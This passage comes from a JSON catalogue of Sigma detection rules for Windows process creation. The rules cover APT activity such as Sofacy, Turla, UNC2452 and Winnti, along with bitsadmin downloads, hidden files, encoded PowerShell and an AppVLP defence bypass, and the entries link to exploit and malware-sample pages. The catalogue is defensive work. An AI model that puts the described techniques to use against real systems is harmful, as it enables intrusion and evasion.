"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Trojan loader activity as used by APT28", - "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "value": "Sofacy Trojan Loader Activity", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", - "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", - "https://twitter.com/ClearskySec/status/960924755355369472", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" - ], - "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" - ], - "creation_date": "2018/03/01", - "filename": "proc_creation_win_apt_sofacy.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "value": "SOURGUM Actor Behaviours", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", - "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" - ], - "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/15", - "filename": "proc_creation_win_apt_sourgrum.yml", - "author": "MSTIC, FPT.EagleEye", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", - "value": "Ps.exe Renamed SysInternals Tool", - "meta": { - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA17-293A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" - ], - "creation_date": "2017/10/22", - "filename": "proc_creation_win_apt_ta17_293a_ps.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Renamed SysInternals tool" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "value": "TA505 Dropper Load Pattern", - "meta": { - "refs": [ - "https://twitter.com/ForensicITGuy/status/1334734244120309760", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" - ], - "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" - ], - "creation_date": "2020/12/08", - "filename": "proc_creation_win_apt_ta505_dropper.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", - "value": "TAIDOOR RAT DLL Load", - "meta": { - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" - ], - "tags": [ - "attack.execution", - "attack.t1055.001" - ], - "creation_date": "2020/07/30", - "filename": "proc_creation_win_apt_taidoor.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "value": "TropicTrooper Campaign November 2018", - "meta": { - "refs": [ - "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/11/12", - "filename": "proc_creation_win_apt_tropictrooper.yml", - "author": "@41thexplorer, Microsoft Defender ATP", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects automated lateral movement by Turla group", - "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "value": "Turla Group Lateral Movement", - "meta": { - "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" - ], - "creation_date": "2017/11/07", - "filename": "proc_creation_win_apt_turla_commands_critical.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects automated lateral movement by Turla group", - "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", - "value": "Automated Turla Group Lateral Movement", - "meta": { - "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" - ], - "creation_date": "2017/11/07", - "filename": "proc_creation_win_apt_turla_commands_medium.yml", - "author": "Markus Neis", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "value": "Turla Group Commands May 2020", - "meta": { - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], - "creation_date": "2020/05/26", - "filename": "proc_creation_win_apt_turla_comrat_may20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "value": "UNC2452 Process Creation Patterns", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/01/22", - "filename": "proc_creation_win_apt_unc2452_cmds.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", - "value": "UNC2452 PowerShell Pattern", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" - ], - "creation_date": "2021/01/20", - "filename": "proc_creation_win_apt_unc2452_ps.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", - "uuid": "7453575c-a747-40b9-839b-125a0aae324b", - "value": "Unidentified Attacker November 2018", - "meta": { - "refs": [ - "https://twitter.com/DrunkBinary/status/1063075530180886529", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218.011" - ], - "creation_date": "2018/11/20", - "filename": "proc_creation_win_apt_unidentified_nov_18.yml", - "author": "@41thexplorer, Microsoft Defender ATP", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", - "value": "Winnti Malware HK University Campaign", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ], - "creation_date": "2020/02/01", - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", - "author": "Florian Roth, Markus Neis", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", - "value": "Winnti Pipemon Characteristics", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ], - "creation_date": "2020/07/30", - "filename": "proc_creation_win_apt_winnti_pipemon.yml", - "author": "Florian Roth, oscd.community", - "level": "critical", - "falsepositive": [ - "Legitimate setups that use similar flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", - "value": "Operation Wocao Activity", - "meta": { - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - "https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2019/12/20", - "filename": "proc_creation_win_apt_wocao.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a ZxShell start by the called and well-known function name", - "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "value": "ZxShell Malware", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "creation_date": "2017/07/20", - "filename": "proc_creation_win_apt_zxshell.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "meta": { - "refs": [ - "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" - ], - "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" - ], - "creation_date": "2020/03/13", - "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", - "value": "Phishing Pattern ISO in Archive", - "meta": { - "refs": [ - "https://twitter.com/1ZRR4H/status/1534259727059787783", - "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566" - ], - "creation_date": "2022/06/07", - "filename": "proc_creation_win_archiver_iso_phishing.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", - "value": "Using AppVLP To Circumvent ASR File Path Rule", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2020/03/13", - "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", - "value": "Atlassian Confluence CVE-2021-26084", - "meta": { - "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", - "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", - "https://github.com/h3v0x/CVE-2021-26084_Confluence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" - ], - "creation_date": "2021/09/08", - "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of attrib.exe to hide files from users.", - "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", - "value": "Hiding Files with Attrib.exe", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_attrib_hiding_files.yml", - "author": "Sami Ruohonen", - "level": "low", - "falsepositive": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Marks a file as a system file using the attrib.exe utility", - "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "value": "Set Windows System File with Attrib", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/02/04", - "filename": "proc_creation_win_attrib_system.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", - "uuid": "efec536f-72e8-4656-8960-5e85d091345b", - "value": "Set Suspicious Files as System Files Using Attrib", - "meta": { - "refs": [ - "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", - "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_attrib_system_susp_paths.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", - "value": "Automated Collection Command Prompt", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2021/07/28", - "filename": "proc_creation_win_automated_collection.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", - "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "meta": { - "refs": [ - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", - "https://www.cobaltstrike.com/help-opsec", - "https://twitter.com/CyberRaiju/status/1251492025678983169", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/10/23", - "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", - "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", - "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/05/31", - "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded listing Win32_Shadowcopy", - "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", - "value": "Base64 Encoded Listing of Shadowcopy", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/03/01", - "filename": "proc_creation_win_base64_listing_shadowcopy.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "value": "Base64 Encoded Reflective Assembly Load", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027", - "attack.t1620" - ], - "creation_date": "2022/03/01", - "filename": "proc_creation_win_base64_reflective_assembly_load.yml", - "author": "Christian Burkard, pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file", - "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "value": "Bitsadmin Download", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2017/03/09", - "filename": "proc_creation_win_bitsadmin_download.yml", - "author": "Michael Haag, FPT.EagleEye", - "level": "medium", - "falsepositive": [ - "Some legitimate apps use this, but limited." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "value": "Bitsadmin Download from Suspicious Domain", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Some legitimate apps use this, but limited." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", - "value": "Bitsadmin Download File with Suspicious Extension", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "uuid": "99c840f2-2012-46fd-9141-c761987550ef", - "value": "Bitsadmin Download File from IP", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "value": "Bitsadmin Download to Suspicious Target Folder", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", - "value": "Bitsadmin Download to Uncommon Target Folder", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", - "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "value": "Modification of Boot Configuration", - "meta": { - "refs": [ - 